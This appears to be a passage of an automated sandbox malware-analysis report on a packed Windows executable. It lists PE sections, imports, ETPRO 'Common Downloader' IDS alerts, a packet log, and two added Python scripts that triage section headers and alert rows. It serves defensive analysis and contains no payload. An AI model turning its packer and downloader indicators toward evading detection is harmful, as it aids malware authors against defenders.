                                                                                • [C++] VS2008 SP1 build 30729
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [ASM] VS2008 build 21022
                                                                                • [C++] VS2008 build 21022
                                                                                • [ C ] VS2008 build 21022
                                                                                • [RES] VS2008 build 21022
                                                                                • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x27a3d4c | 0x190 | .data31
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x282e000 | 0x4592 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x282d000 | 0x5c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x282c77c | 0x40 | .data31
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x27b7000 | 0xb0 | .data31
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x9f294 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x846f8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x86000 | 0x1c33e | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa3000 | 0x97fc | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data30 | 0xad000 | 0x12a69fd | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data31 | 0x1354000 | 0x14d8a54 | 0x14d8c00 | 232ea150950940c8cf3f2d8b479af5e3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x282d000 | 0x5c | 0x200 | 78588159bfd2e5aff0c27794550cf906 | False | 0.1796875 | data | 1.1738687156309555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x282e000 | 0x4592 | 0x4600 | 0288680ade4eceade2c58335ecdf7dc6 | False | 0.30970982142857145 | data | 5.170651237530648 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
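The section table above shows the layout typical of a VMProtect-style packed binary: the original .text/.rdata/.data sections have a raw size of 0 (nothing on disk, filled at run time), while the two large .data30/.data31 sections are marked code, executable and writable at once, and every data directory that matters (import table, IAT, load config) points into .data31. The following is an added example, not Joe Sandbox code, that decodes IMAGE_SECTION_HEADER records with the standard library and prints those indicators. The section records it parses are constructed from the numbers in the table, so it runs without the sample; the flag constants are the PE/COFF IMAGE_SCN_* values.

```python
"""Triage PE section headers for packer indicators (stand-alone added example).

The section records below are constructed from the report's section table;
no real file is read. IMAGE_SECTION_HEADER layout and the IMAGE_SCN_* flag
values follow the PE/COFF specification.
"""
import struct
from dataclasses import dataclass

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_SECTION_HEADER: 8-byte name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics (40 bytes total).
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int

    def contains_rva(self, rva: int) -> bool:
        return self.virtual_address <= rva < self.virtual_address + self.virtual_size


def pack_section(name: str, va: int, vsize: int, raw: int, flags: int) -> bytes:
    """Build one raw IMAGE_SECTION_HEADER (only used to construct the sample input)."""
    return SECTION_HEADER.pack(name.encode("ascii").ljust(8, b"\0"),
                               vsize, va, raw, 0, 0, 0, 0, 0, flags)


def parse_section_headers(blob: bytes, count: int) -> list:
    """Decode `count` consecutive section headers starting at offset 0 of `blob`."""
    sections = []
    for i in range(count):
        f = SECTION_HEADER.unpack_from(blob, i * SECTION_HEADER.size)
        name = f[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append(Section(name, f[2], f[1], f[3], f[9]))
    return sections


def section_for_rva(sections, rva: int):
    """Map an RVA (e.g. a data-directory entry) to the section holding it, as in 'Is in Section'."""
    for s in sections:
        if s.contains_rva(rva):
            return s.name
    return None


def packer_indicators(sections) -> dict:
    """Per-section notes that usually mean the on-disk code is not the code that runs."""
    findings = {}
    for s in sections:
        notes = []
        executable = s.characteristics & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
        writable = s.characteristics & IMAGE_SCN_MEM_WRITE
        if executable and writable:
            notes.append("writable+executable")
        if s.raw_size == 0 and s.virtual_size > 0:
            notes.append("no raw data: filled at runtime")
        if executable and s.raw_size > 0 and s.name not in (".text", "CODE"):
            notes.append("executable section with unusual name")
        if notes:
            findings[s.name] = notes
    return findings


# Constructed input mirroring the report's table: name, VA, virtual size, raw size, flags.
CODE_RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_R = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
DATA_RW = DATA_R | IMAGE_SCN_MEM_WRITE
RWX_MIXED = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_CNT_INITIALIZED_DATA |
             IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)

SAMPLE_HEADERS = b"".join([
    pack_section(".text",   0x1000,    0x846f8,   0x0,       CODE_RX),
    pack_section(".rdata",  0x86000,   0x1c33e,   0x0,       DATA_R),
    pack_section(".data",   0xa3000,   0x97fc,    0x0,       DATA_RW),
    pack_section(".data30", 0xad000,   0x12a69fd, 0x0,       RWX_MIXED),
    pack_section(".data31", 0x1354000, 0x14d8a54, 0x14d8c00, RWX_MIXED),
    pack_section(".reloc",  0x282d000, 0x5c,      0x200,     DATA_R),
    pack_section(".rsrc",   0x282e000, 0x4592,    0x4600,    DATA_R),
])

if __name__ == "__main__":
    secs = parse_section_headers(SAMPLE_HEADERS, 7)
    for name, notes in packer_indicators(secs).items():
        print(f"{name:8s} {', '.join(notes)}")
    print("import directory 0x27a3d4c lives in", section_for_rva(secs, 0x27a3d4c))
```

On a real file the same parser applies to the 40-byte records that follow the optional header (offset e_lfanew + 24 + SizeOfOptionalHeader, NumberOfSections of them); the checks here deliberately ignore entropy so that they also work on sections whose raw data is absent, as with the first three sections above.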
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x282e0e8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m | Chinese | China | 0.2984766178554558
RT_GROUP_ICON | 0x2832310 | 0x14 | data | Chinese | China | 1.1
RT_MANIFEST | 0x2832324 | 0x26e | ASCII text, with CRLF line terminators | English | United States | 0.5176848874598071
DLL | Import
KERNEL32.dll | GetVersionExA, GetProcAddress
USER32.dll | GetCursorPos
GDI32.dll | CreateSolidBrush
MSIMG32.dll | AlphaBlend
COMDLG32.dll | GetFileTitleA
WINSPOOL.DRV | OpenPrinterA
ADVAPI32.dll | RegOpenKeyA
SHELL32.dll | ShellExecuteA
COMCTL32.dll | _TrackMouseEvent
SHLWAPI.dll | PathFindFileNameA
oledlg.dll |
ole32.dll | OleFlushClipboard
OLEAUT32.dll | SafeArrayAccessData
WININET.dll | InternetWriteFile
gdiplus.dll | GdipAddPathRectangleI
IMM32.dll | ImmAssociateContext
WS2_32.dll | closesocket
KERNEL32.dll | GetModuleFileNameW
KERNEL32.dll | GetModuleHandleA, LoadLibraryA, LocalAlloc, LocalFree, GetModuleFileNameA, ExitProcess
Language of compilation system | Country where language is spoken
Chinese | China
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T14:25:19.638998+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49723 | 119.29.29.29 | 80 | TCP
2024-12-05T14:25:20.255035+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49721 | 182.254.116.116 | 80 | TCP
2024-12-05T14:25:31.983543+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49759 | 182.254.116.116 | 80 | TCP
2024-12-05T14:25:31.984552+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49761 | 182.254.116.116 | 80 | TCP
2024-12-05T14:25:32.084642+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49760 | 119.29.29.29 | 80 | TCP
2024-12-05T14:25:32.089093+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49758 | 119.29.29.29 | 80 | TCP
2024-12-05T14:25:40.148938+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49722 | 114.114.114.114 | 80 | TCP
2024-12-05T14:25:43.383580+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49730 | 114.114.114.114 | 80 | TCP
2024-12-05T14:25:46.334829+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49797 | 119.29.29.29 | 80 | TCP
2024-12-05T14:25:46.336136+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49796 | 119.29.29.29 | 80 | TCP
2024-12-05T14:25:46.960635+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49798 | 182.254.116.116 | 80 | TCP
2024-12-05T14:25:46.960886+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49799 | 182.254.116.116 | 80 | TCP
2024-12-05T14:26:02.165299+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49784 | 114.114.114.114 | 80 | TCP
2024-12-05T14:26:05.431002+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49792 | 114.114.114.114 | 80 | TCP
2024-12-05T14:26:22.302707+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49892 | 119.29.29.29 | 80 | TCP
2024-12-05T14:26:22.489188+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49846 | 114.114.114.114 | 80 | TCP
2024-12-05T14:26:22.489234+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49854 | 114.114.114.114 | 80 | TCP
2024-12-05T14:26:22.489252+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49893 | 182.254.116.116 | 80 | TCP
2024-12-05T14:26:32.332586+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49920 | 119.29.29.29 | 80 | TCP
2024-12-05T14:26:32.876493+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49921 | 182.254.116.116 | 80 | TCP
2024-12-05T14:26:39.492886+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49944 | 119.29.29.29 | 80 | TCP
2024-12-05T14:26:39.844409+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49943 | 182.254.116.116 | 80 | TCP
2024-12-05T14:26:46.521255+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49961 | 119.29.29.29 | 80 | TCP
2024-12-05T14:26:46.864753+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49962 | 182.254.116.116 | 80 | TCP
2024-12-05T14:26:53.027833+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49922 | 114.114.114.114 | 80 | TCP
2024-12-05T14:26:54.369878+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49985 | 119.29.29.29 | 80 | TCP
2024-12-05T14:26:55.637475+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49986 | 182.254.116.116 | 80 | TCP
2024-12-05T14:26:59.513848+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50002 | 119.29.29.29 | 80 | TCP
2024-12-05T14:26:59.906551+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50001 | 182.254.116.116 | 80 | TCP
2024-12-05T14:27:00.150774+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49942 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:01.395278+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49987 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:01.395384+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50009 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:05.633759+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50014 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:07.295551+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50027 | 119.29.29.29 | 80 | TCP
2024-12-05T14:27:07.649580+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50026 | 182.254.116.116 | 80 | TCP
2024-12-05T14:27:09.941646+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50028 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:14.318476+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50047 | 119.29.29.29 | 80 | TCP
2024-12-05T14:27:14.664651+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50046 | 182.254.116.116 | 80 | TCP
2024-12-05T14:27:16.961981+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50048 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:21.254480+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50069 | 119.29.29.29 | 80 | TCP
2024-12-05T14:27:21.595844+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50068 | 182.254.116.116 | 80 | TCP
2024-12-05T14:27:23.910418+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50067 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:26.246010+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50083 | 119.29.29.29 | 80 | TCP
2024-12-05T14:27:26.661897+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50084 | 182.254.116.116 | 80 | TCP
2024-12-05T14:27:34.363435+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50090 | 119.29.29.29 | 80 | TCP
2024-12-05T14:27:35.259924+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50089 | 182.254.116.116 | 80 | TCP
2024-12-05T14:27:46.901575+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50082 | 114.114.114.114 | 80 | TCP
2024-12-05T14:27:55.026580+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 50088 | 114.114.114.114 | 80 | TCP
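Every alert in the table above is the same ETPRO signature (SID 2803274) firing from the sandbox host against three destinations on TCP/80, repeated over roughly two and a half minutes. When triaging a report like this, the useful view is not the row list but the per-destination picture: how many hits, first and last seen, and whether the hits recur at a regular cadence. The following added example (not Joe Sandbox code) parses alert rows written in the pipe-separated layout used above, groups them by destination and estimates the median interval between hits. The embedded rows are a constructed subset of the table above.

```python
"""Triage Suricata/Snort-style alert rows from a sandbox report (stand-alone added example).

SAMPLE_ALERTS is a constructed subset of the report's IDS alert table, one alert per line:
timestamp | SID | signature | severity | src IP | src port | dst IP | dst port | protocol
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import median
from typing import Optional

SAMPLE_ALERTS = """\
2024-12-05T14:25:19.638998+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49723 | 119.29.29.29 | 80 | TCP
2024-12-05T14:25:20.255035+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49721 | 182.254.116.116 | 80 | TCP
2024-12-05T14:25:32.084642+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49760 | 119.29.29.29 | 80 | TCP
2024-12-05T14:25:40.148938+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49722 | 114.114.114.114 | 80 | TCP
2024-12-05T14:25:46.334829+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49797 | 119.29.29.29 | 80 | TCP
2024-12-05T14:26:22.302707+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49892 | 119.29.29.29 | 80 | TCP
"""


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


@dataclass
class Destination:
    dst_ip: str
    dst_port: int
    proto: str
    count: int
    first_seen: datetime
    last_seen: datetime
    sids: tuple                      # distinct SIDs that hit this destination
    median_gap_s: Optional[float]    # None when there is only one alert


def parse_alert(line: str) -> Alert:
    """Split one pipe-separated row; the timestamp keeps its +0100 offset."""
    f = [p.strip() for p in line.split("|")]
    if len(f) != 9:
        raise ValueError(f"expected 9 fields, got {len(f)}: {line!r}")
    ts = datetime.strptime(f[0], "%Y-%m-%dT%H:%M:%S.%f%z")
    return Alert(ts, int(f[1]), f[2], int(f[3]), f[4], int(f[5]), f[6], int(f[7]), f[8])


def parse_alerts(text: str) -> list[Alert]:
    return [parse_alert(line) for line in text.splitlines() if line.strip()]


def summarize_by_destination(alerts) -> list[Destination]:
    """Group alerts per (dst IP, dst port, protocol), busiest destination first."""
    groups = defaultdict(list)
    for a in alerts:
        groups[(a.dst_ip, a.dst_port, a.proto)].append(a)
    out = []
    for (ip, port, proto), items in groups.items():
        items.sort(key=lambda a: a.ts)
        # Gaps between consecutive hits; a tight median suggests a polling/beacon loop.
        gaps = [(later.ts - earlier.ts).total_seconds()
                for earlier, later in zip(items, items[1:])]
        out.append(Destination(ip, port, proto, len(items), items[0].ts, items[-1].ts,
                               tuple(sorted({a.sid for a in items})),
                               round(median(gaps), 1) if gaps else None))
    out.sort(key=lambda d: (-d.count, d.dst_ip))
    return out


if __name__ == "__main__":
    for d in summarize_by_destination(parse_alerts(SAMPLE_ALERTS)):
        print(f"{d.dst_ip}:{d.dst_port}/{d.proto}  hits={d.count}  "
              f"first={d.first_seen.time()}  last={d.last_seen.time()}  "
              f"median_gap_s={d.median_gap_s}  sids={d.sids}")
```

Run against the full table the same code gives the three destinations with their hit counts and the spacing of the hits; the median gap is more robust than the mean here because the first burst (several alerts within milliseconds, each on a different source port) would otherwise pull the average down.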
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 14:25:09.938047886 CET | 49706 | 5566 | 192.168.2.5 | 43.154.56.182
Dec 5, 2024 14:25:10.057885885 CET | 5566 | 49706 | 43.154.56.182 | 192.168.2.5
Dec 5, 2024 14:25:10.057976961 CET | 49706 | 5566 | 192.168.2.5 | 43.154.56.182
Dec 5, 2024 14:25:10.058543921 CET | 49706 | 5566 | 192.168.2.5 | 43.154.56.182
Dec 5, 2024 14:25:10.178281069 CET | 5566 | 49706 | 43.154.56.182 | 192.168.2.5
Dec 5, 2024 14:25:11.156563997 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:11.276307106 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:11.279771090 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:11.281021118 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:11.400713921 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:11.643975019 CET | 5566 | 49706 | 43.154.56.182 | 192.168.2.5
Dec 5, 2024 14:25:11.644093037 CET | 49706 | 5566 | 192.168.2.5 | 43.154.56.182
Dec 5, 2024 14:25:11.676393986 CET | 49710 | 80 | 192.168.2.5 | 43.153.236.147
Dec 5, 2024 14:25:11.797991037 CET | 80 | 49710 | 43.153.236.147 | 192.168.2.5
Dec 5, 2024 14:25:11.798075914 CET | 49710 | 80 | 192.168.2.5 | 43.153.236.147
Dec 5, 2024 14:25:11.798522949 CET | 49710 | 80 | 192.168.2.5 | 43.153.236.147
Dec 5, 2024 14:25:11.882880926 CET | 49711 | 80 | 192.168.2.5 | 104.192.110.226
Dec 5, 2024 14:25:11.918230057 CET | 80 | 49710 | 43.153.236.147 | 192.168.2.5
Dec 5, 2024 14:25:11.989497900 CET | 49712 | 80 | 192.168.2.5 | 163.181.92.233
Dec 5, 2024 14:25:12.002873898 CET | 80 | 49711 | 104.192.110.226 | 192.168.2.5
Dec 5, 2024 14:25:12.002940893 CET | 49711 | 80 | 192.168.2.5 | 104.192.110.226
Dec 5, 2024 14:25:12.003326893 CET | 49711 | 80 | 192.168.2.5 | 104.192.110.226
Dec 5, 2024 14:25:12.109275103 CET | 80 | 49712 | 163.181.92.233 | 192.168.2.5
Dec 5, 2024 14:25:12.109366894 CET | 49712 | 80 | 192.168.2.5 | 163.181.92.233
Dec 5, 2024 14:25:12.109844923 CET | 49712 | 80 | 192.168.2.5 | 163.181.92.233
Dec 5, 2024 14:25:12.123207092 CET | 80 | 49711 | 104.192.110.226 | 192.168.2.5
Dec 5, 2024 14:25:12.229532003 CET | 80 | 49712 | 163.181.92.233 | 192.168.2.5
Dec 5, 2024 14:25:12.907692909 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.907819033 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.907833099 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.907867908 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:12.907947063 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.907999992 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:12.908004045 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.908018112 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.908030987 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.908042908 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.908056974 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:12.908082962 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:12.908759117 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.908771038 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:12.908807993 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:12.922466993 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:12.922780991 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:13.027704000 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:13.027721882 CET | 80 | 49708 | 103.235.46.96 | 192.168.2.5
Dec 5, 2024 14:25:13.027786016 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:13.029639006 CET | 49708 | 80 | 192.168.2.5 | 103.235.46.96
Dec 5, 2024 14:25:13.042469978 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:13.042546988 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:13.042954922 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:13.162663937 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:13.362621069 CET | 80 | 49712 | 163.181.92.233 | 192.168.2.5
Dec 5, 2024 14:25:13.367566109 CET | 49712 | 80 | 192.168.2.5 | 163.181.92.233
Dec 5, 2024 14:25:13.479584932 CET | 80 | 49710 | 43.153.236.147 | 192.168.2.5
Dec 5, 2024 14:25:13.485430002 CET | 49710 | 80 | 192.168.2.5 | 43.153.236.147
Dec 5, 2024 14:25:13.601111889 CET | 80 | 49711 | 104.192.110.226 | 192.168.2.5
Dec 5, 2024 14:25:13.604832888 CET | 49711 | 80 | 192.168.2.5 | 104.192.110.226
Dec 5, 2024 14:25:13.649452925 CET | 49715 | 80 | 192.168.2.5 | 119.28.131.242
Dec 5, 2024 14:25:13.770092964 CET | 80 | 49715 | 119.28.131.242 | 192.168.2.5
Dec 5, 2024 14:25:13.770170927 CET | 49715 | 80 | 192.168.2.5 | 119.28.131.242
Dec 5, 2024 14:25:13.770395994 CET | 49715 | 80 | 192.168.2.5 | 119.28.131.242
Dec 5, 2024 14:25:13.890149117 CET | 80 | 49715 | 119.28.131.242 | 192.168.2.5
Dec 5, 2024 14:25:14.311316967 CET | 49716 | 80 | 192.168.2.5 | 27.221.16.149
Dec 5, 2024 14:25:14.311310053 CET | 49717 | 80 | 192.168.2.5 | 27.221.16.149
Dec 5, 2024 14:25:14.432713032 CET | 80 | 49716 | 27.221.16.149 | 192.168.2.5
Dec 5, 2024 14:25:14.432728052 CET | 80 | 49717 | 27.221.16.149 | 192.168.2.5
Dec 5, 2024 14:25:14.432817936 CET | 49717 | 80 | 192.168.2.5 | 27.221.16.149
Dec 5, 2024 14:25:14.432841063 CET | 49716 | 80 | 192.168.2.5 | 27.221.16.149
Dec 5, 2024 14:25:14.433376074 CET | 49717 | 80 | 192.168.2.5 | 27.221.16.149
Dec 5, 2024 14:25:14.433428049 CET | 49716 | 80 | 192.168.2.5 | 27.221.16.149
Dec 5, 2024 14:25:14.553121090 CET | 80 | 49717 | 27.221.16.149 | 192.168.2.5
Dec 5, 2024 14:25:14.553132057 CET | 80 | 49716 | 27.221.16.149 | 192.168.2.5
Dec 5, 2024 14:25:14.601835966 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.601860046 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.601871967 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.601912022 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
Dec 5, 2024 14:25:14.601968050 CET | 80 | 49713 | 103.235.47.188 | 192.168.2.5
Dec 5, 2024 14:25:14.602005005 CET | 49713 | 80 | 192.168.2.5 | 103.235.47.188
